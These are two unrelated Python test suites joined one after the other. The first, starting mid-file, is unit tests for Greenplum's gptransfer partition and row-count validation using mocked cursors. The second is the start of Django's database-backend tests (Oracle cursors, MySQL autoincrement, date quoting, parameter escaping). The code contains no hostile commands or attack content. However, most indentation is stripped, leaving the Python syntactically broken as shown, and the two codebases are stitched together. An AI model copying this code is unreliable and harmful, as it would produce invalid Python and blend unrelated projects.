["public", "my_table_partition2", ""]],
}
cursor_side_effect = CursorSideEffect(additional=additional)
self.cursor.side_effect = cursor_side_effect.cursor_side_effect
self.subject.GpTransfer(Mock(**options), []).run()
self.assertIn("Validation of %s successful", self.get_info_messages())
def test__partition_to_normal_table_succeeds(self):
options = self.setup_partition_to_normal_validation()
# simulate that dest normal table has 0 rows to begin with and 20 when finished
multi = {
"SELECT count(*) FROM": [[20], [0]]
}
self.db_singleton.side_effect = SingletonSideEffect(multi_list=multi).singleton_side_effect
self.subject.GpTransfer(Mock(**options), []).run()
self.assertNotIn("Validation failed for %s", self.get_warnings())
self.assertIn("Validation of %s successful", self.get_info_messages())
def test__final_count_validation_same_counts_src_dest_passes(self):
options = self.setup_normal_to_normal_validation()
self.subject.GpTransfer(Mock(**options), []).run()
self.assertIn("Validation of %s successful", self.get_info_messages())
def test__validates_good_partition(self):
options = self.setup_partition_validation()
self.subject.GpTransfer(Mock(**options), [])
self.assertIn("Validating partition table transfer set...", self.get_info_messages())
def test__partition_to_nonexistent_partition_fails(self):
options = self.setup_partition_validation()
with open(options["input_file"], "w") as src_map_file:
src_map_file.write(
"my_first_database.public.my_table_partition1, my_first_database.public.my_table_partition2")
self.cursor.side_effect = CursorSideEffect().cursor_side_effect
with self.assertRaisesRegexp(Exception, "does not exist in destination database when transferring from "
"partition tables .filtering for destination leaf partitions because "
"of option \"--partition-transfer\"."):
self.subject.GpTransfer(Mock(**options), [])
def test__partition_to_nonexistent_normal_table_fails(self):
options = self.setup_partition_to_normal_validation()
with open(options["input_file"], "w") as src_map_file:
src_map_file.write("my_first_database.public.my_table_partition1, my_first_database.public.does_not_exist")
self.cursor.side_effect = CursorSideEffect().cursor_side_effect
with self.assertRaisesRegexp(Exception, "does not exist in destination database when transferring from "
"partition tables .filtering for destination non-partition tables because "
"of option \"--partition-transfer-non-partition-target\"."):
self.subject.GpTransfer(Mock(**options), [])
def test__partition_to_multiple_same_partition_tables_fails(self):
options = self.setup_partition_validation()
with open(options["input_file"], "w") as src_map_file:
src_map_file.write(
"my_first_database.public.my_table_partition1\nmy_first_database.public.my_table_partition3, my_first_database.public.my_table_partition1")
cursor_side_effect = CursorSideEffect()
cursor_side_effect.first_values[cursor_keys["partition_tables"]] = [["public", "my_table_partition1", ""],
["public", "my_table_partition3", ""]]
self.cursor.side_effect = cursor_side_effect.cursor_side_effect
with self.assertRaisesRegexp(Exception, "Multiple tables map to"):
self.subject.GpTransfer(Mock(**options), [])
def test__partition_to_nonpartition_table_with_different_columns_fails(self):
options = self.setup_partition_to_normal_validation()
with open(options["input_file"], "w") as src_map_file:
src_map_file.write("my_first_database.public.my_table_partition1, my_first_database.public.my_normal_table")
additional = {
cursor_keys["normal_tables"]: [["public", "my_normal_table", ""]],
cursor_keys['table_info']: [
[1, "t", "my_new_data_type", 255, 16, 1024, 1024, 1, 1024, "my_interval_type", "my_udt_name"]],
}
cursor_side_effect = CursorSideEffect(additional=additional)
cursor_side_effect.first_values[cursor_keys["partition_tables"]] = [["public", "my_table_partition1", ""]]
self.cursor.side_effect = cursor_side_effect.cursor_side_effect
with self.assertRaisesRegexp(Exception, "has different column layout or types"):
self.subject.GpTransfer(Mock(**options), [])
def test__multiple_partitions_to_same_normal_table_succeeds(self):
options = self.setup_partition_to_normal_validation()
with open(options["input_file"], "w") as src_map_file:
src_map_file.write(
"my_first_database.public.my_table_partition1, my_first_database.public.my_normal_table\nmy_first_database.public.my_table_partition2, my_first_database.public.my_normal_table")
additional = {
cursor_keys["normal_tables"]: [["public", "my_normal_table", ""]],
}
cursor_side_effect = CursorSideEffect(additional=additional)
cursor_side_effect.first_values[cursor_keys["partition_tables"]] = [["public", "my_table_partition1", ""],
["public", "my_table_partition2", ""]]
self.cursor.side_effect = cursor_side_effect.cursor_side_effect
# call through to unmocked version of this function because the function gets called too many times
# to easily mock in this case
self.subject.escapeDoubleQuoteInSQLString = escapeDoubleQuoteInSQLString
class SingletonSideEffectWithIterativeReturns(SingletonSideEffect):
def __init__(self):
SingletonSideEffect.__init__(self)
self.values['SELECT count(*) FROM "public"."my_normal_table"'] = [[[30], [15], [15]]]
self.counters['SELECT count(*) FROM "public"."my_normal_table"'] = 0
def singleton_side_effect(self, *args):
for key in self.values.keys():
for arg in args:
if key in arg:
value_list = self.values[key]
result = value_list[self.counters[key] % len(value_list)]
if any(isinstance(i, list) for i in value_list):
result = result[self.counters[key] % len(value_list)]
self.counters[key] += 1
return result
return None
self.db_singleton.side_effect = SingletonSideEffectWithIterativeReturns().singleton_side_effect
self.subject.GpTransfer(Mock(**options), []).run()
self.assertNotIn("Validation failed for %s", self.get_warnings())
self.assertIn("Validation of %s successful", self.get_info_messages())
def test__validate_nonpartition_tables_with_truncate_fails(self):
options = self.setup_partition_to_normal_validation()
options.update(truncate=True)
with self.assertRaisesRegexp(Exception, "--truncate is not allowed with option --partition-transfer-non-partition-target"):
self.subject.GpTransfer(Mock(**options), [])
def test__validate_bad_partition_source_not_leaf_fails(self):
options = self.setup_partition_validation()
cursor_side_effect = CursorSideEffect()
cursor_side_effect.first_values[cursor_keys['relations']] = ["my_relname1", "my_relname2"]
self.cursor.side_effect = cursor_side_effect.cursor_side_effect
with self.assertRaisesRegexp(Exception, "Source table "):
self.subject.GpTransfer(Mock(**options), [])
def test__validate_partition_when_source_and_dest_have_different_column_count_fails(self):
options = self.setup_partition_validation()
additional = {
cursor_keys['table_info']: [
["t", "my_data_type", 255, 16, 1024, 1024, 1, 1024, "my_interval_type", "my_udt_name"],
["t", "my_data_type", 255, 16, 1024, 1024, 1, 1024, "my_interval_type", "my_udt_name"]],
}
self.cursor.side_effect = CursorSideEffect(additional).cursor_side_effect
with self.assertRaisesRegexp(Exception, "has different column layout or types"):
self.subject.GpTransfer(Mock(**options), [])
def test__validate_bad_partition_different_column_type_fails(self):
options = self.setup_partition_validation()
additional = {
cursor_keys['table_info']: [
["t", "my_new_data_type", 255, 16, 1024, 1024, 1, 1024, "my_interval_type", "my_udt_name"]],
}
self.cursor.side_effect = CursorSideEffect(additional).cursor_side_effect
with self.assertRaisesRegexp(Exception, "has different column layout or types"):
self.subject.GpTransfer(Mock(**options), [])
def test__validate_bad_partition_different_max_levels_fails(self):
options = self.setup_partition_validation()
additional = {
"select max(p1.partitionlevel)": [2],
}
self.db_singleton.side_effect = SingletonSideEffect(additional).singleton_side_effect
with self.assertRaisesRegexp(Exception, "has different partition criteria from destination table"):
self.subject.GpTransfer(Mock(**options), [])
log_messages = self.get_error_logging()
self.assertIn("Max level of partition is not same between", log_messages[0])
def test__validate_bad_partition_different_values_of_attributes_fails(self):
options = self.setup_partition_validation()
additional = {
cursor_keys['partition_info']: [["my_parkind", 1, 1, "3 4"]],
}
self.cursor.side_effect = CursorSideEffect(additional).cursor_side_effect
with self.assertRaisesRegexp(Exception, "has different partition criteria from destination table"):
self.subject.GpTransfer(Mock(**options), [])
log_messages = self.get_error_logging()
self.assertIn("Partition type or key is different between", log_messages[1])
self.assertIn("Partition column attributes are different at level", log_messages[0])
def test__validate_partition_transfer_when_different_partition_attributes_fails(self):
options = self.setup_partition_validation()
additional = {
cursor_keys['partition_info']: [["my_parkind", 1, 2, "3 4"]],
}
self.cursor.side_effect = CursorSideEffect(additional).cursor_side_effect
with self.assertRaisesRegexp(Exception, "has different partition criteria from destination table"):
self.subject.GpTransfer(Mock(**options), [])
log_messages = self.get_error_logging()
self.assertIn("Partition type or key is different between", log_messages[1])
self.assertIn("Number of partition columns is different at level", log_messages[0])
def test__validate_bad_partition_different_parent_kind_fails(self):
options = self.setup_partition_validation()
additional = {
cursor_keys['partition_info']: [["different_parkind", 1, "my_parnatts", "my_paratts"]],
}
self.cursor.side_effect = CursorSideEffect(additional).cursor_side_effect
with self.assertRaisesRegexp(Exception, "has different partition criteria from destination table"):
self.subject.GpTransfer(Mock(**options), [])
log_messages = self.get_error_logging()
self.assertIn("Partition type or key is different between", log_messages[1])
self.assertIn("Partition type is different at level", log_messages[0])
def test__validate_bad_partition_different_number_of_attributes_fails(self):
options = self.setup_partition_validation()
additional = {
cursor_keys['partition_info']: [["my_parkind", 1, 2, "my_paratts"]],
}
self.cursor.side_effect = CursorSideEffect(additional).cursor_side_effect
with self.assertRaisesRegexp(Exception, "has different partition criteria from destination table"):
self.subject.GpTransfer(Mock(**options), [])
log_messages = self.get_error_logging()
self.assertIn("Partition type or key is different between", log_messages[1])
self.assertIn("Number of partition columns is different at level ", log_messages[0])
def test__validate_bad_partition_different_partition_values_fails(self):
options = self.setup_partition_validation()
additional = {
"select n.nspname, c.relname": [["not_public", "not_my_table", ""], ["public", "my_table_partition1", ""]],
"select parisdefault, parruleord, parrangestartincl,": ["t", "1", "t", "t", 100, 10, "", ""],
}
self.db_singleton.side_effect = SingletonSideEffect(additional).singleton_side_effect
with self.assertRaisesRegexp(Exception, "has different partition criteria from destination table"):
self.subject.GpTransfer(Mock(**options), [])
log_messages = self.get_error_logging()
self.assertIn("One of the subpartition table is a default partition", log_messages[0])
self.assertIn("Partition value is different in the partition hierarchy between", log_messages[1])
def test__validate_bad_partition_unknown_type_fails(self):
options = self.setup_partition_validation()
my_singleton = SingletonSideEffect()
my_singleton.values["select partitiontype"] = ["unknown"]
self.db_singleton.side_effect = my_singleton.singleton_side_effect
with self.assertRaisesRegexp(Exception, "Unknown partitioning type "):
self.subject.GpTransfer(Mock(**options), [])
def test__validate_bad_partition_different_list_values_fails(self):
options = self.setup_partition_validation()
additional = {
"select parisdefault, parruleord, parrangestartincl,": ["f", "1", "t", "t", 100, 10, "", "different"],
}
my_singleton = SingletonSideEffect(additional)
my_singleton.values["select partitiontype"] = [["list"]]
self.db_singleton.side_effect = my_singleton.singleton_side_effect
with self.assertRaisesRegexp(Exception, "has different partition criteria from destination table"):
self.subject.GpTransfer(Mock(**options), [])
log_messages = self.get_error_logging()
self.assertIn("List partition value is different between", log_messages[0])
self.assertIn("Partition value is different in the partition hierarchy between", log_messages[1])
def test__validate_bad_partition_different_range_values_fails(self):
self.run_range_partition_value(
{"select parisdefault, parruleord, parrangestartincl,": ["f", "1", "f", "t", 100, 10, "", "different"]})
self.run_range_partition_value(
{"select parisdefault, parruleord, parrangestartincl,": ["f", "1", "t", "f", 999, 10, "", "different"]})
self.run_range_partition_value(
{"select parisdefault, parruleord, parrangestartincl,": ["f", "1", "t", "t", 100, 999, "", "different"]})
self.run_range_partition_value(
{"select parisdefault, parruleord, parrangestartincl,": ["f", "1", "t", "t", 100, 10, 999, "different"]})
def test__validate_bad_partition_different_parent_partition_fails(self):
options = self.setup_partition_validation()
multi = {
"select parisdefault, parruleord, parrangestartincl,": [["f", "1", "t", "t", 100, 10, "", ""],
["f", "1", "t", "t", 100, 10, "", ""],
["f", "1", "t", "t", 999, 10, "", ""]],
}
singleton_side_effect = SingletonSideEffect(multi_list=multi)
self.db_singleton.side_effect = singleton_side_effect.singleton_side_effect
with self.assertRaisesRegexp(Exception, "has different partition criteria from destination table"):
self.subject.GpTransfer(Mock(**options), [])
error_messages = self.get_error_logging()
self.assertIn("Range partition value is different between source partition table", error_messages[0])
self.assertIn("Partitions have different parents at level", error_messages[1])
def test__validate_pt_non_pt_target_with_validator__fails(self):
options = self.setup_partition_to_normal_validation()
options['validator'] = "MD5"
with self.assertRaisesRegexp(Exception, "--partition-transfer-non-partition-target option cannot be used with --validate option"):
self.subject.GpTransfer(Mock(**options), [])
def test__validate_pt_non_pt_target_with_partition_transfer__fails(self):
options = self.setup_partition_to_normal_validation()
options['partition_transfer'] = True
with self.assertRaisesRegexp(Exception, "--partition-transfer option cannot be used with --partition-transfer-non-partition-target option"):
self.subject.GpTransfer(Mock(**options), [])
def test__validate_pt_non_pt_target_without_input_file__fails(self):
options = self.setup_partition_to_normal_validation()
options['input_file'] = None
with self.assertRaisesRegexp(Exception, "--partition-transfer-non-partition-target option must be used with -f option"):
self.subject.GpTransfer(Mock(**options), [])
def test__validate_pt_non_pt_target_with_databases__fails(self):
options = self.setup_partition_to_normal_validation()
options['databases'] = ['db1']
with self.assertRaisesRegexp(Exception, "--partition-transfer-non-partition-target option cannot be used with -d option"):
self.subject.GpTransfer(Mock(**options), [])
def test__validate_pt_non_pt_target_with_dest_databases__fails(self):
options = self.setup_partition_to_normal_validation()
options['dest_database'] = ['db1']
with self.assertRaisesRegexp(Exception, "--partition-transfer-non-partition-target option cannot be used with --dest-database option"):
self.subject.GpTransfer(Mock(**options), [])
def test__validate_pt_non_pt_target_with_drop__fails(self):
options = self.setup_partition_to_normal_validation()
options['drop'] = True
with self.assertRaisesRegexp(Exception, "--partition-transfer-non-partition-target option cannot be used with --drop option"):
self.subject.GpTransfer(Mock(**options), [])
def test__validate_pt_non_pt_target_with_tables__fails(self):
options = self.setup_partition_to_normal_validation()
options['tables'] = ['public.table1']
with self.assertRaisesRegexp(Exception, "--partition-transfer-non-partition-target option cannot be used with -t option"):
self.subject.GpTransfer(Mock(**options), [])
def test__validate_pt_non_pt_target_with_schema_only__fails(self):
options = self.setup_partition_to_normal_validation()
options['schema_only'] = True
with self.assertRaisesRegexp(Exception, "--partition-transfer-non-partition-target option cannot be used with --schema-only option"):
self.subject.GpTransfer(Mock(**options), [])
def test__validate_pt_non_pt_target_with_full__fails(self):
options = self.setup_partition_to_normal_validation()
options['full'] = True
with self.assertRaisesRegexp(Exception, "--partition-transfer-non-partition-target option cannot be used with --full option"):
self.subject.GpTransfer(Mock(**options), [])
def test__validate_pt_non_pt_target_with_exclude_input_file__fails(self):
options = self.setup_partition_to_normal_validation()
options['exclude_input_file'] = tempfile.NamedTemporaryFile(dir=self.TEMP_DIR, delete=False)
with self.assertRaisesRegexp(Exception, "--partition-transfer-non-partition-target option cannot be used with any exclude table option"):
self.subject.GpTransfer(Mock(**options), [])
def test__validate_pt_non_pt_target_with_exclude_tables__fails(self):
options = self.setup_partition_to_normal_validation()
options['exclude_tables'] = ['public.table1']
with self.assertRaisesRegexp(Exception, "--partition-transfer-non-partition-target option cannot be used with any exclude table option"):
self.subject.GpTransfer(Mock(**options), [])
def test__partition_to_normal_multiple_same_dest_must_come_from_same_source_partition(self):
options = self.setup_partition_to_normal_validation()
with open(options["input_file"], "w") as src_map_file:
src_map_file.write(
"my_first_database.public.my_table_partition1, my_first_database.public.my_normal_table\nmy_first_database.public.my_table_partition2, my_first_database.public.my_normal_table")
additional = {
cursor_keys["normal_tables"]: [["public", "my_normal_table", ""]],
}
cursor_side_effect = CursorSideEffect(additional=additional)
cursor_side_effect.first_values[cursor_keys["partition_tables"]] = [["public", "my_table_partition1", ""],
["public", "my_table_partition2", ""]]
self.cursor.side_effect = cursor_side_effect.cursor_side_effect
class SingletonSideEffectWithIterativeReturns(SingletonSideEffect):
def __init__(self, multi_value=None):
SingletonSideEffect.__init__(self, multi_list=multi_value)
self.values["SELECT count(*) FROM public.my_normal_table"] = [[[30, 15, 15]]]
self.counters["SELECT count(*) FROM public.my_normal_table"] = 0
def singleton_side_effect(self, *args):
for key in self.values.keys():
for arg in args:
if key in arg:
value_list = self.values[key]
result = value_list[self.counters[key] % len(value_list)]
if any(isinstance(i, list) for i in value_list):
result = result[self.counters[key] % len(value_list)]
self.counters[key] += 1
return result
return None
multi_value = {
"select n.nspname, c.relname": [["public", "my_table_partition1"], ["public", "other_parent"]]
}
self.db_singleton.side_effect = SingletonSideEffectWithIterativeReturns(multi_value=multi_value).singleton_side_effect
with self.assertRaisesRegexp(Exception, "partition sources: public.my_table_partition1, "
"public.my_table_partition2, when transferred to "
"the same destination: table public.my_normal_table , "
"must share the same parent"):
self.subject.GpTransfer(Mock(**options), []).run()
def test__validating_transfer_with_empty_source_map_file_raises_proper_exception(self):
options = self.setup_partition_to_normal_validation()
source_map_filename = tempfile.NamedTemporaryFile(dir=self.TEMP_DIR, delete=False)
source_map_filename.write("")
source_map_filename.flush()
options.update(
source_map_file=source_map_filename.name
)
with self.assertRaisesRegexp(Exception, "No hosts in map"):
self.subject.GpTransfer(Mock(**options), [])
def test__row_count_validation_escapes_schema_and_table_names(self):
self.subject.escapeDoubleQuoteInSQLString.side_effect = ['"escapedSchema"', '"escapedTable"', '"escapedSchema"', '"escapedTable"']
escaped_query = 'SELECT count(*) FROM "escapedSchema"."escapedTable"'
table_mock = Mock(spec=['schema','table'])
table_mock.schema = 'mySchema'
table_mock.table = 'myTable'
table_pair = Mock(spec=['source','dest'])
table_pair.source = table_mock
table_pair.dest = table_mock
validator = self.subject.CountTableValidator('some_work_dir', table_pair, 'fake_db_connection', 'fake_db_connection')
self.assertEqual(escaped_query, validator._src_sql)
self.assertEqual(escaped_query, validator._dest_sql)
####################################################################################################################
# End of tests, start of private methods/objects
####################################################################################################################
def get_error_logging(self):
return [args[0][0] for args in self.subject.logger.error.call_args_list]
def get_info_messages(self):
return [args[0][0] for args in self.subject.logger.info.call_args_list]
def get_warnings(self):
return [args[0][0] for args in self.subject.logger.warning.call_args_list]
def _get_gptransfer_command(self):
gptransfer = self.subject
cmd_args = self.GpTransferCommand_args
src_args = ('src', 'public', 'foo', False)
dest_args = ('dest', 'public', 'foo', False)
source_table = gptransfer.GpTransferTable(*src_args)
dest_table = gptransfer.GpTransferTable(*dest_args)
cmd_args['table_pair'] = gptransfer.GpTransferTablePair(source_table, dest_table)
return gptransfer.GpTransferCommand(**cmd_args)
def run_range_partition_value(self, additional):
options = self.setup_partition_validation()
self.db_singleton.side_effect = SingletonSideEffect(additional).singleton_side_effect
with self.assertRaisesRegexp(Exception, "has different partition criteria from destination table"):
self.subject.GpTransfer(Mock(**options), [])
log_messages = self.get_error_logging()
self.assertIn("Range partition value is different between", log_messages[0])
self.assertIn("Partition value is different in the partition hierarchy between", log_messages[1])
def createGpArrayWith2Primary2Mirrors(self):
master = GpDB.initFromString(
"1|-1|p|p|s|u|mdw|mdw|5432|None|/data/master||/data/master/base/10899,/data/master/base/1,/data/master/base/10898,/data/master/base/25780,/data/master/base/34782")
primary0 = GpDB.initFromString(
"2|0|p|p|s|u|sdw1|sdw1|40000|41000|/data/primary0||/data/primary0/base/10899,/data/primary0/base/1,/data/primary0/base/10898,/data/primary0/base/25780,/data/primary0/base/34782")
primary1 = GpDB.initFromString(
"3|1|p|p|s|u|sdw2|sdw2|40001|41001|/data/primary1||/data/primary1/base/10899,/data/primary1/base/1,/data/primary1/base/10898,/data/primary1/base/25780,/data/primary1/base/34782")
mirror0 = GpDB.initFromString(
"4|0|m|m|s|u|sdw2|sdw2|50000|51000|/data/mirror0||/data/mirror0/base/10899,/data/mirror0/base/1,/data/mirror0/base/10898,/data/mirror0/base/25780,/data/mirror0/base/34782")
mirror1 = GpDB.initFromString(
"5|1|m|m|s|u|sdw1|sdw1|50001|51001|/data/mirror1||/data/mirror1/base/10899,/data/mirror1/base/1,/data/mirror1/base/10898,/data/mirror1/base/25780,/data/mirror1/base/34782")
return GpArray([master, primary0, primary1, mirror0, mirror1])
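    # The setup_* helpers below write temporary input and host-map files and install the default cursor/singleton side effects.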
def setup_partition_validation(self):
source_map_filename = tempfile.NamedTemporaryFile(dir=self.TEMP_DIR, delete=False)
source_map_filename.write("sdw1,12700\nsdw2,12700")
input_filename = tempfile.NamedTemporaryFile(dir=self.TEMP_DIR, delete=False)
input_filename.write("my_first_database.public.my_table_partition1")
self.cursor.side_effect = CursorSideEffect().cursor_side_effect
self.db_singleton.side_effect = SingletonSideEffect().singleton_side_effect
options = {}
options.update(self.GpTransfer_options_defaults)
options.update(
partition_transfer=True,
input_file=input_filename.name,
source_map_file=source_map_filename.name,
base_port=15432,
max_line_length=32768,
work_base_dir="/tmp",
source_port=45432,
dest_port=15432,
)
return options
def setup_partition_to_normal_validation(self):
source_map_filename = tempfile.NamedTemporaryFile(dir=self.TEMP_DIR, delete=False)
source_map_filename.write("sdw1,12700\nsdw2,12700")
input_filename = tempfile.NamedTemporaryFile(dir=self.TEMP_DIR, delete=False)
input_filename.write("my_first_database.public.my_table_partition1, "
"my_second_database.public.my_normal_table")
additional = {
cursor_keys['relations']: ["my_relname", "another_rel"],
}
self.cursor.side_effect = CursorSideEffect(additional=additional).cursor_side_effect
self.db_singleton.side_effect = SingletonSideEffect().singleton_side_effect
options = {}
options.update(self.GpTransfer_options_defaults)
options.update(
partition_transfer_non_pt_target=True,
input_file=input_filename.name,
source_map_file=source_map_filename.name,
base_port=15432,
max_line_length=32768,
work_base_dir="/tmp",
source_port=45432,
dest_port=15432,
)
return options
def setup_normal_to_normal_validation(self):
source_map_filename = tempfile.NamedTemporaryFile(dir=self.TEMP_DIR, delete=False)
source_map_filename.write("sdw1,12700\nsdw2,12700")
source_map_filename.flush()
input_filename = tempfile.NamedTemporaryFile(dir=self.TEMP_DIR, delete=False)
input_filename.write("my_first_database.public.my_normal_table")
input_filename.flush()
additional = {
cursor_keys["normal_tables"]: [["public", "my_normal1_table", ""]],
}
cursor_side_effect = CursorSideEffect(additional=additional)
cursor_side_effect.second_values["normal_tables"] = [[]]
self.cursor.side_effect = cursor_side_effect.cursor_side_effect
self.db_singleton.side_effect = SingletonSideEffect().singleton_side_effect
options = {}
options.update(self.GpTransfer_options_defaults)
options.update(
input_file=input_filename.name,
source_map_file=source_map_filename.name,
base_port=15432,
max_line_length=32768,
work_base_dir="/tmp",
source_port=45432,
dest_port=15432,
)
return options
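# Side effect for the mocked execSQL: the first query matching a regexp key gets a FakeCursor over first_values, later matches get second_values.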
class CursorSideEffect:
def __init__(self, additional=None):
self.first_values = {
cursor_keys["normal_tables"]: [["public", "my_normal_table", ""]],
cursor_keys["partition_tables"]: [["public", "my_table_partition1", ""]],
cursor_keys['relations']: ["my_relname"],
cursor_keys['table_info']: [
["t", "my_data_type", 255, 16, 1024, 1024, 1, 1024, "my_interval_type", "my_udt_name"]],
cursor_keys['partition_info']: [["my_parkind", 1, 1, "1"]],
cursor_keys['schema_name']: ["public"],
cursor_keys['create_schema']: ["my_schema"],
cursor_keys['ordinal_pos']: [[1]],
}
self.counters = dict((key, 0) for key in self.first_values.keys())
self.second_values = self.first_values.copy()
if additional:
self.second_values.update(additional)
def cursor_side_effect(self, *args):
for key in self.first_values.keys():
for arg in args[1:]:
arg_oneline = " ".join(arg.split("\n"))
if key.search(arg_oneline):
if self.has_called(key):
return FakeCursor(self.second_values[key])
return FakeCursor(self.first_values[key])
return None
def has_called(self, key):
self.counters[key] += 1
return self.counters[key] > 1
def append_regexp_key(self, key, value):
self.first_values[key] = value
self.second_values[key] = value
self.counters[key] = 0
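# Minimal stand-in for a pgdb cursor that iterates over a canned list of rows.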
class FakeCursor:
def __init__(self, my_list):
self.list = []
if my_list:
self.list = my_list
self.rowcount = len(self.list)
def __iter__(self):
return iter(self.list)
def close(self):
pass
def fetchall(self):
return self.list
# Side effect for the mocked execSQLForSingletonRow: returns canned rows (mostly partition info) keyed by SQL substring, cycling through each key's value list on repeated calls.
class SingletonSideEffect:
def __init__(self, additional=None, multi_list=None):
self.values = {
"select partitiontype": ["range"],
"select max(p1.partitionlevel)": [1],
"select schemaname, tablename from pg_catalog.pg_partitions": ["public", "my_table_partition1"],
"select c.oid": ["oid1", "oid1"],
"select parisdefault, parruleord, parrangestartincl,": ["f", "1", "t", "t", 100, 10, "", ""],
"select n.nspname, c.relname": ["public", "my_table_partition1"],
"SELECT count(*) FROM": [20]
}
self.counters = dict((key, 0) for key in self.values.keys())
# make values into list to accommodate multiple sequential values
self.values = dict((key, [value]) for (key, value) in self.values.iteritems())
for key in self.values.keys():
if additional:
if key in additional:
value = self.values[key]
value.append(additional[key])
if multi_list:
if key in multi_list:
value = self.values[key]
value.extend(multi_list[key])
def singleton_side_effect(self, *args):
for key in self.values.keys():
for arg in args:
if key in arg:
value_list = self.values[key]
result = value_list[self.counters[key] % len(value_list)]
self.counters[key] += 1
return result
return None
if __name__ == '__main__':
run_tests()
|
|
# -*- coding: utf-8 -*-
# Unit and doctests for specific database backends.
from __future__ import absolute_import
import datetime
import threading
from django.conf import settings
from django.core.management.color import no_style
from django.core.exceptions import ImproperlyConfigured
from django.db import (backend, connection, connections, DEFAULT_DB_ALIAS,
IntegrityError, transaction)
from django.db.backends.signals import connection_created
from django.db.backends.postgresql_psycopg2 import version as pg_version
from django.db.utils import ConnectionHandler, DatabaseError, load_backend
from django.test import (TestCase, skipUnlessDBFeature, skipIfDBFeature,
TransactionTestCase)
from django.test.utils import override_settings
from django.utils import unittest
from . import models
class OracleChecks(unittest.TestCase):
@unittest.skipUnless(connection.vendor == 'oracle',
"No need to check Oracle cursor semantics")
def test_dbms_session(self):
# If the backend is Oracle, test that we can call a standard
# stored procedure through our cursor wrapper.
convert_unicode = backend.convert_unicode
cursor = connection.cursor()
cursor.callproc(convert_unicode('DBMS_SESSION.SET_IDENTIFIER'),
[convert_unicode('_django_testing!'),])
@unittest.skipUnless(connection.vendor == 'oracle',
"No need to check Oracle cursor semantics")
def test_cursor_var(self):
# If the backend is Oracle, test that we can pass cursor variables
# as query parameters.
cursor = connection.cursor()
var = cursor.var(backend.Database.STRING)
cursor.execute("BEGIN %s := 'X'; END; ", [var])
self.assertEqual(var.getvalue(), 'X')
@unittest.skipUnless(connection.vendor == 'oracle',
"No need to check Oracle cursor semantics")
def test_long_string(self):
# If the backend is Oracle, test that we can save a text longer
# than 4000 chars and read it properly
c = connection.cursor()
c.execute('CREATE TABLE ltext ("TEXT" NCLOB)')
long_str = ''.join([unicode(x) for x in xrange(4000)])
c.execute('INSERT INTO ltext VALUES (%s)',[long_str])
c.execute('SELECT text FROM ltext')
row = c.fetchone()
self.assertEqual(long_str, row[0].read())
c.execute('DROP TABLE ltext')
@unittest.skipUnless(connection.vendor == 'oracle',
"No need to check Oracle connection semantics")
def test_client_encoding(self):
# If the backend is Oracle, test that the client encoding is set
# correctly. This was broken under Cygwin prior to r14781.
connection.cursor() # Ensure the connection is initialized.
self.assertEqual(connection.connection.encoding, "UTF-8")
self.assertEqual(connection.connection.nencoding, "UTF-8")
class MySQLTests(TestCase):
@unittest.skipUnless(connection.vendor == 'mysql',
"Test valid only for MySQL")
def test_autoincrement(self):
"""
Check that auto_increment fields are reset correctly by sql_flush().
Before MySQL version 5.0.13 TRUNCATE did not do auto_increment reset.
Refs #16961.
"""
statements = connection.ops.sql_flush(no_style(),
tables=['test'],
sequences=[{
'table': 'test',
'col': 'somecol',
}])
found_reset = False
for sql in statements:
found_reset = found_reset or 'ALTER TABLE' in sql
if connection.mysql_version < (5,0,13):
self.assertTrue(found_reset)
else:
self.assertFalse(found_reset)
class DateQuotingTest(TestCase):
def test_django_date_trunc(self):
"""
        Test the custom ``django_date_trunc`` method, in particular against
fields which clash with strings passed to it (e.g. 'year') - see
#12818__.
__: http://code.djangoproject.com/ticket/12818
"""
updated = datetime.datetime(2010, 2, 20)
models.SchoolClass.objects.create(year=2009, last_updated=updated)
years = models.SchoolClass.objects.dates('last_updated', 'year')
self.assertEqual(list(years), [datetime.datetime(2010, 1, 1, 0, 0)])
def test_django_extract(self):
"""
        Test the custom ``django_extract`` method, in particular against fields
which clash with strings passed to it (e.g. 'day') - see #12818__.
__: http://code.djangoproject.com/ticket/12818
"""
updated = datetime.datetime(2010, 2, 20)
models.SchoolClass.objects.create(year=2009, last_updated=updated)
classes = models.SchoolClass.objects.filter(last_updated__day=20)
self.assertEqual(len(classes), 1)
class LastExecutedQueryTest(TestCase):
def setUp(self):
# connection.queries will not be filled in without this
settings.DEBUG = True
def tearDown(self):
settings.DEBUG = False
# There are no tests for the sqlite backend because it does not
    # implement parameter escaping. See #14091.
@unittest.skipUnless(connection.vendor in ('oracle', 'postgresql'),
"These backends use the standard parameter escaping rules")
def test_parameter_escaping(self):
# check that both numbers and string are properly quoted
list(models.Tag.objects.filter(name="special:\\\"':", object_id=12))
sql = connection.queries[-1]['sql']
self.assertTrue("= 'special:\\\"'':' " in sql)
self.assertTrue("= 12 " in sql)
@unittest.skipUnless(connection.vendor == 'mysql',
"MySQL uses backslashes to escape parameters.")
    def test_parameter_escaping_mysql(self):
list(models.Tag.objects.filter(name="special:\\\"':", object_id=12))
sql = connection.queries[-1]['sql']
# only this line is different from the test above
self.assertTrue("= 'special:\\\\\\\"\\':' " in sql)
self.assertTrue("= 12 " in sql)
class ParameterHandlingTest(TestCase):
def test_bad_parameter_count(self):
"An executemany call with too many/not enough parameters will raise an exception (Refs #12612)"
cursor = connection.cursor()
query = ('INSERT INTO %s (%s, %s) VALUES (%%s, %%s)' % (
connection.introspection.table_name_converter('backends_square'),
connection.ops.quote_name('root'),
connection.ops.quote_name('square')
))
self.assertRaises(Exception, cursor.executemany, query, [(1,2,3),])
self.assertRaises(Exception, cursor.executemany, query, [(1,),])
# Unfortunately, the following tests would be a good test to run on all
# backends, but it breaks MySQL hard. Until #13711 is fixed, it can't be run
# everywhere (although it would be an effective test of #13711).
class LongNameTest(TestCase):
"""Long primary keys and model names can result in a sequence name
that exceeds the database limits, which will result in truncation
on certain databases (e.g., Postgres). The backend needs to use
the correct sequence name in last_insert_id and other places, so
check it is. Refs #8901.
"""
@skipUnlessDBFeature('supports_long_model_names')
def test_sequence_name_length_limits_create(self):
"""Test creation of model with long name and long pk name doesn't error. Ref #8901"""
models.VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ.objects.create()
@skipUnlessDBFeature('supports_long_model_names')
def test_sequence_name_length_limits_m2m(self):
"""Test an m2m save of a model with a long name and a long m2m field name doesn't error as on Django >=1.2 this now uses object saves. Ref #8901"""
obj = models.VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ.objects.create()
rel_obj = models.Person.objects.create(first_name='Django', last_name='Reinhardt')
